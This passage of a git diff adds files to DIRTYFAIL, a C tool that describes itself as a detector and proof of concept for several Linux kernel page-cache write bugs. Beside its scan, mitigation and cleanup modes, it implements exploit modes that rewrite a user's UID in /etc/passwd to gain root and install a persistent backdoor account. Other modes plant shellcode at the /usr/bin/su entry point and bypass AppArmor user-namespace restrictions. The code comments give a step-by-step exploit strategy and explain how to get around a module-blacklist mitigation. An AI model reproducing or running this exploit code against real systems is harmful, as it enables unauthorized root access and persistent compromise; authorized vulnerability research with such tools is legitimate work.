unlink(tmpl); return DF_TEST_ERROR; } + char tmp[4096]; + if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) { + close(rfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(rfd); + + setenv("DIRTYFAIL_INNER_MODE", "gcm-probe", 1); + setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1); + int rc = apparmor_bypass_fork_arm(0, NULL); + unsetenv("DIRTYFAIL_INNER_MODE"); + unsetenv("DIRTYFAIL_PROBE_SENTINEL"); + + if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; } + if (rc != DF_EXPLOIT_OK) { + log_bad("gcm-probe inner failed (exit=%d)", rc); + unlink(tmpl); return DF_TEST_ERROR; + } + + rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + unsigned char after[16]; + ssize_t got = read(rfd, after, sizeof(after)); + close(rfd); + unlink(tmpl); + if (got <= 0) return DF_TEST_ERROR; + + if (after[0] != 'A') { + log_warn("ACTIVE PROBE gcm: sentinel[0] changed 'A' β†’ 0x%02x β†’ kernel is VULNERABLE", + after[0]); + return DF_VULNERABLE; + } + log_ok("ACTIVE PROBE gcm: sentinel[0] intact β€” kernel rfc4106 path appears patched"); + return DF_OK; +} diff --git a/modules/copy_fail_family/copyfail_gcm.h b/modules/copy_fail_family/copyfail_gcm.h new file mode 100644 index 0000000..72ebee1 --- /dev/null +++ b/modules/copy_fail_family/copyfail_gcm.h @@ -0,0 +1,61 @@ +/* + * DIRTYFAIL β€” copyfail_gcm.h + * + * Single-byte page-cache write via xfrm-ESP `rfc4106(gcm(aes))` AEAD. + * + * This module is a sibling primitive to copyfail.c (4-byte authencesn + * STORE) and dirtyfrag_esp.c (4-byte authencesn STORE via XFRM). It + * targets the SAME bug class (CVE-2026-43284 xfrm-ESP no-COW path), + * but uses `rfc4106(gcm(aes))` instead of `authencesn(...)` as the + * AEAD. That changes the primitive in two useful ways: + * + * 1. Coverage. A defender who blacklisted only `algif_aead` to stop + * Copy Fail (CVE-2026-31431) is still vulnerable here β€” neither + * algif_aead nor the authencesn template is on the path. + * + * 2. Granularity. AES-GCM is a counter-mode cipher; in-place + * "decryption" is just XORing the keystream onto the spliced + * page byte. We can land an arbitrary single byte at any file + * offset (no 4-byte alignment, no 4-byte side-effects) by + * brute-forcing the IV until keystream[0] equals + * `target_byte XOR desired_byte`. + * + * The 1-byte primitive is what makes the persistent backdoor mode + * (`backdoor.c`) feasible without alignment juggling. + * + * Technique credit: 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo + * (`copyfail2.c`), reimplemented here in DIRTYFAIL style. + */ + +#ifndef DIRTYFAIL_COPYFAIL_GCM_H +#define DIRTYFAIL_COPYFAIL_GCM_H + +#include "common.h" + +/* Detection: kernel + esp4 + rfc4106(gcm(aes)) availability + userns. */ +df_result_t copyfail_gcm_detect(void); + +/* End-to-end PoC: flip /etc/passwd UID via rfc4106(gcm(aes)) STORE. + * Equivalent functional outcome to copyfail_exploit() and + * dirtyfrag_esp_exploit() β€” different kernel path. */ +df_result_t copyfail_gcm_exploit(bool do_shell); +df_result_t copyfail_gcm_exploit_inner(void); + +/* Low-level building block exposed for backdoor.c: + * write a single byte at `target_path` offset `target_off`. The caller + * MUST already be inside a fresh user namespace with CAP_NET_ADMIN + * (ESP SA registration prerequisite). Returns true on apparent + * success β€” caller verifies via re-read. */ +bool cfg_1byte_write(const char *target_path, + off_t target_off, + unsigned char desired_byte); + +/* Active probe: installs a GCM SA with arbitrary IV, fires ONE + * gcm_trigger against a /tmp sentinel. Skips IV brute force entirely; + * the kernel STORE writes an unpredictable byte (keystream XOR 'A') + * which still confirms the path is reachable. Returns DF_VULNERABLE + * on byte change, DF_OK if intact, DF_PRECOND_FAIL on AA-block. */ +df_result_t copyfail_gcm_active_probe(void); +df_result_t copyfail_gcm_active_probe_inner(void); + +#endif diff --git a/modules/copy_fail_family/dirtyfail.c b/modules/copy_fail_family/dirtyfail.c new file mode 100644 index 0000000..8d5f99b --- /dev/null +++ b/modules/copy_fail_family/dirtyfail.c @@ -0,0 +1,475 @@ +/* + * DIRTYFAIL β€” main entry point + * + * A single binary that detects and (with explicit consent) demonstrates + * exploitation of: + * + * - Copy Fail CVE-2026-31431 + * - Dirty Frag (xfrm-ESP) CVE-2026-43284 + * - Dirty Frag (RxRPC) CVE-2026-43500 + * + * Default mode is detection. The exploit modes never run without + * --exploit on the command line *and* a typed-string confirmation at + * runtime. + * + * Exit codes: + * 0 not vulnerable (or: exploit succeeded β€” semantically "you can + * now type `exit` and the test ran") + * 1 test error / could not determine + * 2 vulnerable + * 3 exploit attempted but did not land + * 4 preconditions not met (effectively "not vulnerable here") + * 5 exploit succeeded and a root shell was spawned + */ + +#include "common.h" +#include "copyfail.h" +#include "copyfail_gcm.h" +#include "dirtyfrag_esp.h" +#include "dirtyfrag_esp6.h" +#include "dirtyfrag_rxrpc.h" +#include "apparmor_bypass.h" +#include "backdoor.h" +#include "mitigate.h" +#include "exploit_su.h" + +#include +#include +#include + +static const char BANNER[] = +"\n" +" β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•— \n" +" β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ \n" +" β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ \n" +" β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•”β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ \n" +" β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— \n" +" β•šβ•β•β•β•β•β• β•šβ•β•β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β•β•šβ•β•β•šβ•β•β•β•β•β•β• \n" +" Copy Fail + Dirty Frag detector & PoC\n" +" CVE-2026-31431 / 43284 / 43500\n"; + +static void usage(const char *prog) +{ + fprintf(stderr, +"Usage: %s [MODE] [OPTIONS]\n" +"\n" +"Modes (pick one; default is --scan):\n" +" --scan detect all three CVEs (no system modification)\n" +" --check-copyfail Copy Fail (CVE-2026-31431) detection only\n" +" --check-esp Dirty Frag xfrm-ESP (CVE-2026-43284) detection only\n" +" --check-rxrpc Dirty Frag RxRPC (CVE-2026-43500) detection only\n" +" --check-esp6 IPv6 xfrm-ESP path (CVE-2026-43284 v6) detection\n" +" --check-gcm Copy Fail GCM variant detection\n" +" --exploit-copyfail real PoC: flip /etc/passwd UID via algif_aead\n" +" --exploit-esp real PoC: flip /etc/passwd UID via xfrm-ESP (v4)\n" +" --exploit-esp6 real PoC: flip /etc/passwd UID via xfrm-ESP (v6)\n" +" --exploit-rxrpc real PoC: empty /etc/passwd root pwd via rxkad\n" +" (fcrypt brute-force + AF_RXRPC handshake forgery)\n" +" --exploit-gcm real PoC: flip /etc/passwd UID via rfc4106(gcm(aes))\n" +" single-byte primitive (works when authencesn is\n" +" blacklisted but rfc4106 isn't)\n" +" --exploit-backdoor PERSISTENT: insert dirtyfail::0:0:..:/:/bin/bash\n" +" into /etc/passwd page cache; survives shell exit\n" +" until page eviction. Use --cleanup-backdoor to revert.\n" +" --exploit-su V4bel-style: plant arch-specific shellcode at\n" +" /usr/bin/su entry point in page cache; running\n" +" su then yields a /bin/sh root shell. No PAM\n" +" dependency. x86_64 tested; aarch64 ships but is\n" +" hardware-untested (gated behind an env var).\n" +" Saves original entry-point bytes to\n" +" /var/tmp/.dirtyfail-su.state for revert via\n" +" --cleanup-su.\n" +" --cleanup evict /etc/passwd from page cache and drop_caches\n" +" --cleanup-backdoor restore /etc/passwd line from /var/tmp/.dirtyfail.state\n" +" --cleanup-su restore /usr/bin/su entry-point bytes from state file\n" +" --list-state report what (if anything) is currently planted β€”\n" +" reads /var/tmp/.dirtyfail*.state files and\n" +" describes each. Side-effect free.\n" +" --mitigate DEFENSIVE: blacklist algif_aead/esp4/esp6/rxrpc,\n" +" set apparmor_restrict_unprivileged_userns=1.\n" +" Requires root. Side-effect: breaks IPsec/AFS.\n" +" --cleanup-mitigate remove the modprobe/sysctl mitigation files\n" +" --version print version\n" +" --help this message\n" +"\n" +"Options:\n" +" --active in --scan / --check-* mode, do an active sentinel\n" +" STORE probe per CVE in addition to precondition\n" +" checks. Modifies /tmp sentinels only; never\n" +" touches /etc/passwd. Requires AA bypass on\n" +" hardened distros, so may take ~5-10s.\n" +" --no-shell after a successful exploit, do NOT execve `su`;\n" +" instead revert the page-cache patch and exit\n" +" --no-revert with --no-shell, also skip the auto-revert\n" +" (leaves the page cache poisoned β€” used by\n" +" tools/dirtyfail-container-escape.sh demo)\n" +" --json emit a single JSON object on stdout (--scan\n" +" only); all log output redirected to stderr.\n" +" Suitable for SIEM/fleet scanning. Implies\n" +" --no-color and suppresses the banner.\n" +" --no-color disable ANSI color in output\n" +" --aa-bypass force the AppArmor unprivileged-userns bypass\n" +" (auto-armed when restricted profile is detected)\n" +"\n" +"Exit codes:\n" +" 0 not vulnerable / clean 2 vulnerable 5 exploit succeeded\n" +" 1 test error 3 exploit failed 4 preconditions missing\n" +"\n" +"AUTHORIZED TESTING ONLY. Run only on systems you own or are explicitly\n" +"engaged to assess. The --exploit modes corrupt /etc/passwd in the\n" +"kernel page cache; cleanup with --cleanup or `echo 3 > /proc/sys/vm/drop_caches`.\n", + prog); +} + +enum mode { + MODE_SCAN, + MODE_CHECK_COPYFAIL, + MODE_CHECK_ESP, + MODE_CHECK_ESP6, + MODE_CHECK_RXRPC, + MODE_CHECK_GCM, + MODE_EXPLOIT_COPYFAIL, + MODE_EXPLOIT_ESP, + MODE_EXPLOIT_ESP6, + MODE_EXPLOIT_RXRPC, + MODE_EXPLOIT_GCM, + MODE_EXPLOIT_BACKDOOR, + MODE_EXPLOIT_SU, + MODE_CLEANUP, + MODE_CLEANUP_BACKDOOR, + MODE_CLEANUP_SU, + MODE_MITIGATE, + MODE_CLEANUP_MITIGATE, + MODE_LIST_STATE, + MODE_HELP, + MODE_VERSION, +}; + +#define DIRTYFAIL_VERSION "0.1.0" + +int main(int argc, char **argv) +{ + /* Pick up flags that need to survive AA-bypass fork+re-exec via env. + * The child re-execs with its own argv (stage tags only), so flags + * set in the parent's argv don't reach the child unless we propagate + * them through env vars. --json is the main case: without this, the + * child's log_* output goes to stdout and corrupts the JSON document + * the parent is building. */ + if (getenv("DIRTYFAIL_JSON")) { + dirtyfail_json = true; + dirtyfail_use_color = false; + } + + /* If we're a re-exec from the apparmor bypass dance, route to the + * stage handler immediately. Stage 1 re-execs to stage 2; stage 2 + * unshares + raises caps, then either: + * (a) DIRTYFAIL_INNER_MODE is set β†’ we're a fork-based exploit + * child. Dispatch to the inner handler and exit. Parent + * (init ns) reaps us and continues with verify + su. + * (b) Not set β†’ legacy `--aa-bypass` whole-process mode; fall + * through to the normal main() flow with rewritten argv. */ + if (apparmor_bypass_is_stage(argc, argv)) { + int new_argc = argc; + char **new_argv = argv; + if (apparmor_bypass_run_stage(argc, argv, &new_argc, &new_argv) != 0) { + fprintf(stderr, "apparmor bypass stage failed\n"); + return 1; + } + const char *inner = getenv("DIRTYFAIL_INNER_MODE"); + if (inner && *inner) { + df_result_t r = DF_TEST_ERROR; + if (strcmp(inner, "esp") == 0) r = dirtyfrag_esp_exploit_inner(); + else if (strcmp(inner, "esp6") == 0) r = dirtyfrag_esp6_exploit_inner(); + else if (strcmp(inner, "rxrpc") == 0) r = dirtyfrag_rxrpc_exploit_inner(); + else if (strcmp(inner, "gcm") == 0) r = copyfail_gcm_exploit_inner(); + else if (strcmp(inner, "esp-probe") == 0) r = dirtyfrag_esp_active_probe_inner(); + else if (strcmp(inner, "esp6-probe") == 0) r = dirtyfrag_esp6_active_probe_inner(); + else if (strcmp(inner, "rxrpc-probe") == 0) r = dirtyfrag_rxrpc_active_probe_inner(); + else if (strcmp(inner, "gcm-probe") == 0) r = copyfail_gcm_active_probe_inner(); + else if (strcmp(inner, "backdoor-install") == 0) r = backdoor_install_inner(); + else if (strcmp(inner, "backdoor-cleanup") == 0) r = backdoor_cleanup_inner(); + else { + fprintf(stderr, "unknown DIRTYFAIL_INNER_MODE: %s\n", inner); + r = DF_TEST_ERROR; + } + return (int)r; + } + argc = new_argc; + argv = new_argv; + } + + enum mode m = MODE_SCAN; + bool do_shell = true; + bool aa_bypass = false; + + static const struct option opts[] = { + {"scan", no_argument, NULL, 'S'}, + {"check-copyfail", no_argument, NULL, 1 }, + {"check-esp", no_argument, NULL, 2 }, + {"check-rxrpc", no_argument, NULL, 3 }, + {"check-esp6", no_argument, NULL, 9 }, + {"check-gcm", no_argument, NULL, 10 }, + {"exploit-copyfail", no_argument, NULL, 4 }, + {"exploit-esp", no_argument, NULL, 5 }, + {"exploit-esp6", no_argument, NULL, 11 }, + {"exploit-rxrpc", no_argument, NULL, 7 }, + {"exploit-gcm", no_argument, NULL, 12 }, + {"exploit-backdoor", no_argument, NULL, 13 }, + {"cleanup", no_argument, NULL, 6 }, + {"cleanup-backdoor", no_argument, NULL, 14 }, + {"mitigate", no_argument, NULL, 15 }, + {"cleanup-mitigate", no_argument, NULL, 16 }, + {"active", no_argument, NULL, 17 }, + {"exploit-su", no_argument, NULL, 18 }, + {"cleanup-su", no_argument, NULL, 19 }, + {"no-revert", no_argument, NULL, 20 }, + {"json", no_argument, NULL, 21 }, + {"list-state", no_argument, NULL, 22 }, + {"no-shell", no_argument, NULL, 'n'}, + {"no-color", no_argument, NULL, 'C'}, + {"aa-bypass", no_argument, NULL, 8 }, + {"help", no_argument, NULL, 'h'}, + {"version", no_argument, NULL, 'V'}, + {0,0,0,0} + }; + + int c; + while ((c = getopt_long(argc, argv, "ShVnC", opts, NULL)) != -1) { + switch (c) { + case 'S': m = MODE_SCAN; break; + case 1 : m = MODE_CHECK_COPYFAIL; break; + case 2 : m = MODE_CHECK_ESP; break; + case 3 : m = MODE_CHECK_RXRPC; break; + case 4 : m = MODE_EXPLOIT_COPYFAIL; break; + case 5 : m = MODE_EXPLOIT_ESP; break; + case 7 : m = MODE_EXPLOIT_RXRPC; break; + case 6 : m = MODE_CLEANUP; break; + case 9 : m = MODE_CHECK_ESP6; break; + case 10 : m = MODE_CHECK_GCM; break; + case 11 : m = MODE_EXPLOIT_ESP6; break; + case 12 : m = MODE_EXPLOIT_GCM; break; + case 13 : m = MODE_EXPLOIT_BACKDOOR; break; + case 14 : m = MODE_CLEANUP_BACKDOOR; break; + case 15 : m = MODE_MITIGATE; break; + case 16 : m = MODE_CLEANUP_MITIGATE; break; + case 17 : dirtyfail_active_probes = true; break; + case 18 : m = MODE_EXPLOIT_SU; break; + case 19 : m = MODE_CLEANUP_SU; break; + case 20 : dirtyfail_no_revert = true; break; + case 21 : dirtyfail_json = true; + dirtyfail_use_color = false; + /* Propagate through fork+re-exec for AA bypass children */ + setenv("DIRTYFAIL_JSON", "1", 1); + break; + case 22 : m = MODE_LIST_STATE; break; + case 'n': do_shell = false; break; + case 'C': dirtyfail_use_color = false; break; + case 8 : aa_bypass = true; break; + case 'h': m = MODE_HELP; break; + case 'V': m = MODE_VERSION; break; + default : usage(argv[0]); return 1; + } + } + + if (m == MODE_HELP) { usage(argv[0]); return 0; } + if (m == MODE_VERSION) { puts("DIRTYFAIL " DIRTYFAIL_VERSION); return 0; } + + /* Exploit modes now do their OWN fork-based AA bypass internally + * (parent stays in init ns for the post-exploit `su` to drop into + * REAL init-ns root). We only arm the legacy whole-process bypass + * when the operator explicitly requests it via --aa-bypass β€” that + * path is mostly useful for debugging the bypass mechanics in + * isolation, not for actual exploitation. */ + if (aa_bypass) { + log_warn("--aa-bypass: arming legacy whole-process bypass"); + log_hint("note: exploit modes now do their own fork-based bypass; " + "this flag is for debugging only and may break su afterwards."); + if (apparmor_bypass_arm_and_relaunch(argc, argv) != 0) { + log_warn("apparmor bypass failed (%s) β€” continuing un-bypassed", + strerror(errno)); + } + } + + if (!dirtyfail_json) { + if (dirtyfail_use_color) fputs("\033[1;35m", stdout); + fputs(BANNER, stdout); + if (dirtyfail_use_color) fputs("\033[0m", stdout); + fputc('\n', stdout); + } + + df_result_t r = DF_OK; + + switch (m) { + case MODE_SCAN: { + log_step("running full scan β€” five detectors\n"); + + df_result_t a = copyfail_detect(); if (!dirtyfail_json) fputc('\n', stdout); + df_result_t b = dirtyfrag_esp_detect(); if (!dirtyfail_json) fputc('\n', stdout); + df_result_t b6 = dirtyfrag_esp6_detect(); if (!dirtyfail_json) fputc('\n', stdout); + df_result_t c2 = dirtyfrag_rxrpc_detect(); if (!dirtyfail_json) fputc('\n', stdout); + df_result_t g = copyfail_gcm_detect(); if (!dirtyfail_json) fputc('\n', stdout); + + const char *label[] = { + [DF_OK] = "not vulnerable", + [DF_TEST_ERROR] = "test error", + [DF_VULNERABLE] = "VULNERABLE", + [DF_PRECOND_FAIL] = "preconditions missing", + }; + const char *json_label[] = { + [DF_OK] = "not_vulnerable", + [DF_TEST_ERROR] = "test_error", + [DF_VULNERABLE] = "vulnerable", + [DF_PRECOND_FAIL] = "preconds_missing", + }; + + if (!dirtyfail_json) { + log_step("scan summary:"); + log_hint(" Copy Fail (algif_aead, CVE-2026-31431): %s", label[a & 7]); + log_hint(" Dirty Frag ESP v4 (CVE-2026-43284): %s", label[b & 7]); + log_hint(" Dirty Frag ESP v6 (CVE-2026-43284 v6): %s", label[b6 & 7]); + log_hint(" Dirty Frag RxRPC (CVE-2026-43500): %s", label[c2 & 7]); + log_hint(" Copy Fail GCM variant (xfrm rfc4106): %s", label[g & 7]); + } + + if (a == DF_VULNERABLE || b == DF_VULNERABLE || b6 == DF_VULNERABLE || + c2 == DF_VULNERABLE || g == DF_VULNERABLE) + r = DF_VULNERABLE; + else if (a == DF_TEST_ERROR || b == DF_TEST_ERROR || b6 == DF_TEST_ERROR || + c2 == DF_TEST_ERROR || g == DF_TEST_ERROR) + r = DF_TEST_ERROR; + else + r = DF_OK; + + if (dirtyfail_json) { + struct utsname u; uname(&u); + const char *summary = json_label[r & 7]; + printf("{\n"); + printf(" \"tool\": \"dirtyfail\",\n"); + printf(" \"version\": \"" DIRTYFAIL_VERSION "\",\n"); + printf(" \"hostname\": \"%s\",\n", u.nodename); + printf(" \"kernel\": \"%s\",\n", u.release); + printf(" \"machine\": \"%s\",\n", u.machine); + printf(" \"active_probes\": %s,\n", + dirtyfail_active_probes ? "true" : "false"); + printf(" \"results\": [\n"); + printf(" {\"cve\": \"CVE-2026-31431\", \"name\": \"copyfail\", \"status\": \"%s\"},\n", json_label[a & 7]); + printf(" {\"cve\": \"CVE-2026-43284\", \"name\": \"dirtyfrag-esp\", \"status\": \"%s\"},\n", json_label[b & 7]); + printf(" {\"cve\": \"CVE-2026-43284-v6\", \"name\": \"dirtyfrag-esp6\", \"status\": \"%s\"},\n", json_label[b6 & 7]); + printf(" {\"cve\": \"CVE-2026-43500\", \"name\": \"dirtyfrag-rxrpc\", \"status\": \"%s\"},\n", json_label[c2 & 7]); + printf(" {\"cve\": \"CVE-2026-31431-gcm\", \"name\": \"copyfail-gcm\", \"status\": \"%s\"}\n", json_label[g & 7]); + printf(" ],\n"); + printf(" \"summary\": \"%s\"\n", summary); + printf("}\n"); + } + break; + } + + case MODE_CHECK_COPYFAIL: r = copyfail_detect(); break; + case MODE_CHECK_ESP: r = dirtyfrag_esp_detect(); break; + case MODE_CHECK_ESP6: r = dirtyfrag_esp6_detect(); break; + case MODE_CHECK_RXRPC: r = dirtyfrag_rxrpc_detect(); break; + case MODE_CHECK_GCM: r = copyfail_gcm_detect(); break; + + case MODE_EXPLOIT_COPYFAIL: + log_warn("running real PoC for Copy Fail (CVE-2026-31431)"); + r = copyfail_exploit(do_shell); + break; + + case MODE_EXPLOIT_ESP: + log_warn("running real PoC for Dirty Frag xfrm-ESP (CVE-2026-43284)"); + r = dirtyfrag_esp_exploit(do_shell); + break; + + case MODE_EXPLOIT_RXRPC: + log_warn("running real PoC for Dirty Frag RxRPC (CVE-2026-43500)"); + r = dirtyfrag_rxrpc_exploit(do_shell); + break; + + case MODE_EXPLOIT_ESP6: + log_warn("running real PoC for Dirty Frag IPv6 xfrm-ESP"); + r = dirtyfrag_esp6_exploit(do_shell); + break; + + case MODE_EXPLOIT_GCM: + log_warn("running real PoC for Copy Fail GCM variant (rfc4106)"); + r = copyfail_gcm_exploit(do_shell); + break; + + case MODE_EXPLOIT_BACKDOOR: + log_warn("installing PERSISTENT backdoor user 'dirtyfail' (page-cache only)"); + r = backdoor_install(do_shell); + break; + + case MODE_CLEANUP_BACKDOOR: + r = backdoor_cleanup(); + break; + + case MODE_EXPLOIT_SU: + log_warn("planting x86_64 shellcode at /usr/bin/su entry point (page cache)"); + r = exploit_su_shellcode(do_shell); + break; + + case MODE_CLEANUP_SU: + r = cleanup_su_shellcode(); + break; + + case MODE_MITIGATE: + r = mitigate_apply(); + break; + + case MODE_CLEANUP_MITIGATE: + r = mitigate_revert(); + break; + + case MODE_LIST_STATE: { + log_step("--list-state: scanning /var/tmp for stashed dirtyfail state files"); + bool any = false; + if (backdoor_list_state()) any = true; + if (exploit_su_list_state()) any = true; + if (!any) { + log_ok("no dirtyfail state files present β€” system is clean"); + } else { + log_hint("(state files only describe what was planted β€” they do"); + log_hint(" not by themselves prove the page cache is still poisoned;"); + log_hint(" run `--cleanup` / `--cleanup-backdoor` / `--cleanup-su`"); + log_hint(" to evict + restore.)"); + } + r = DF_OK; + break; + } + + case MODE_CLEANUP: + log_step("evicting /etc/passwd page cache"); + if (geteuid() != 0) { + /* POSIX_FADV_DONTNEED on a read-only fd held by a non-root + * user *silently no-ops* on Linux β€” fadvise returns 0 but + * does not actually evict any pages. The only path that + * works without write access is `drop_caches`, which + * itself needs root. So warn the operator clearly. */ + log_warn("running as non-root: POSIX_FADV_DONTNEED will return 0 " + "but NOT evict any pages (kernel ignores it for readers " + "without write access). The page-cache STORE will persist " + "until eviction by memory pressure or reboot."); + log_warn("re-run as 'sudo dirtyfail --cleanup' to drop_caches."); + } else { + int fd = open("/etc/passwd", O_RDONLY); + if (fd >= 0) { +#ifdef POSIX_FADV_DONTNEED + posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED); +#endif + close(fd); + } + log_step("dropping caches"); + if (drop_caches()) log_ok("drop_caches OK"); + else log_warn("drop_caches failed: %s", strerror(errno)); + } + r = DF_OK; + break; + + default: + usage(argv[0]); + return 1; + } + + return (int)r; +} diff --git a/modules/copy_fail_family/dirtyfrag_esp.c b/modules/copy_fail_family/dirtyfrag_esp.c new file mode 100644 index 0000000..abb243c --- /dev/null +++ b/modules/copy_fail_family/dirtyfrag_esp.c @@ -0,0 +1,804 @@ +/* + * DIRTYFAIL β€” dirtyfrag_esp.c β€” Dirty Frag xfrm-ESP variant + * CVE-2026-43284 + * + * BACKGROUND + * ---------- + * In Linux, esp_input() runs the AEAD decryption in-place on the + * incoming skb. Before that, an skb whose payload sits in a frag (i.e. + * not in the linear head β€” the case that arises when userspace plants + * a page via splice()) is supposed to be cloned out into kernel-owned + * memory by skb_cow_data(). The bug: + * + * if (!skb_cloned(skb)) { + * if (!skb_is_nonlinear(skb)) { + * nfrags = 1; + * goto skip_cow; + * } else if (!skb_has_frag_list(skb)) { + * nfrags = skb_shinfo(skb)->nr_frags; + * nfrags++; + * goto skip_cow; // <-- vulnerable branch + * } + * } + * + * If the skb has frags but no frag_list, esp_input skips the COW and + * runs in-place AEAD on the user-supplied page. The same authencesn + * scratch-write that powers Copy Fail then lands at file offset + * (assoclen + cryptlen) inside that page. The 4 STOREd bytes are + * `seq_hi` from the SA's replay_esn state, which userspace controls + * via XFRMA_REPLAY_ESN_VAL on SA registration. + * + * Net result: same 4-byte arbitrary-offset write into a page-cache + * page as Copy Fail, but reachable via the xfrm path *even when + * algif_aead is blacklisted as a Copy Fail mitigation*. + * + * COST: registering an XFRM SA needs CAP_NET_ADMIN, so the attacker + * must enter a fresh user namespace first. This is allowed by default + * on most distros except hardened Ubuntu (AppArmor restrict_unprivileged_userns). + * + * DETECTION STRATEGY + * ------------------ + * Precondition-based: we report VULNERABLE when *all* of these hold: + * - kernel >= 4.10 (commit cac2661c53f3, 2017-01-17) and not patched + * - esp4 module loadable (we don't insmod; rely on autoload) + * - unprivileged user namespace creation works + * + * Avoiding the actual primitive in detect mode keeps the system + * undisturbed (no namespaces created in the parent, no encap sockets, + * no transient SAs). The exploit path runs the full primitive for real. + * + * EXPLOIT STRATEGY + * ---------------- + * Same UID-flip as Copy Fail, but driven through xfrm: + * + * 1. fork() β€” parent stays in init userns to call su afterwards + * 2. child: unshare(CLONE_NEWUSER | CLONE_NEWNET) + * 3. child: write deny β†’ /proc/self/setgroups + * 4. child: write "0 1" β†’ /proc/self/uid_map (and gid_map) + * 5. child: ioctl SIOCSIFFLAGS to bring lo UP + * 6. child: open NETLINK_XFRM, register SA with: + * proto=ESP, mode=TRANSPORT, flags=XFRM_STATE_ESN, + * alg=authencesn(hmac(sha256),cbc(aes)) (zero keys), + * encap=ESPINUDP sport=dport=4500, + * replay_esn.seq_hi = "0000" (the 4 bytes that will land) + * 7. child: open udp_recv @ 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP + * and udp_send connected to 127.0.0.1:4500 + * 8. child: pipe(); vmsplice forged ESP wire header (24 bytes) β†’ + * splice /etc/passwd at uid_off, len 16 β†’ splice pipe β†’ udp_send + * 9. child: recvmsg drives the kernel through the esp_input path, + * firing the 4-byte STORE of "0000" into /etc/passwd + * at the user's UID offset + * 10. child: exits, parent verifies via fresh open of /etc/passwd + * 11. parent: execlp("su", username) β€” PAM checks /etc/shadow on + * disk (untouched), gets right password, setuid(0) lands + * us at root because the page-cache copy of /etc/passwd + * now lists us as UID 0. + */ + +#include "dirtyfrag_esp.h" +#include "apparmor_bypass.h" + +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +#include +#include +#include +#include +#include +#include +#include +#include +#endif + +/* UDP_ENCAP / UDP_ENCAP_ESPINUDP live in , but that header + * conflicts with over `struct udphdr` and we don't + * actually need the struct. The kernel constants are stable, so we + * just hard-code them as fallbacks (the #ifndef makes this a no-op if + * the toolchain happens to expose them already). */ +#ifndef UDP_ENCAP +#define UDP_ENCAP 100 +#endif +#ifndef UDP_ENCAP_ESPINUDP +#define UDP_ENCAP_ESPINUDP 2 +#endif +#ifndef IPPROTO_ESP +#define IPPROTO_ESP 50 +#endif + +#ifndef __linux__ +#define CLONE_NEWUSER 0x10000000 +#define CLONE_NEWNET 0x40000000 +#define IFF_UP 0x01 +#define IFF_RUNNING 0x40 +#define SIOCSIFFLAGS 0x8914 +struct sockaddr_in { int dummy; }; +struct ifreq { int dummy; }; +__attribute__((unused)) +static ssize_t splice (int a, void *b, int c, void *d, size_t e, unsigned f) +{ (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; errno=ENOSYS; return -1; } +__attribute__((unused)) +static ssize_t vmsplice(int a, const struct iovec *b, unsigned long c, unsigned d) +{ (void)a;(void)b;(void)c;(void)d; errno=ENOSYS; return -1; } +__attribute__((unused)) +static int ioctl (int a, unsigned long b, ...) +{ (void)a;(void)b; errno=ENOSYS; return -1; } +#else +extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, + size_t len, unsigned int flags); +extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr, + unsigned int flags); +#endif + +#define ENCAP_PORT 4500 +#define ESP_SPI 0xDEADBE10 +#define MARKER "0000" +#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))" + +/* ---------------------------------------------------------------- * + * Detection + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_esp_detect(void) +{ + log_step("Dirty Frag β€” xfrm-ESP variant 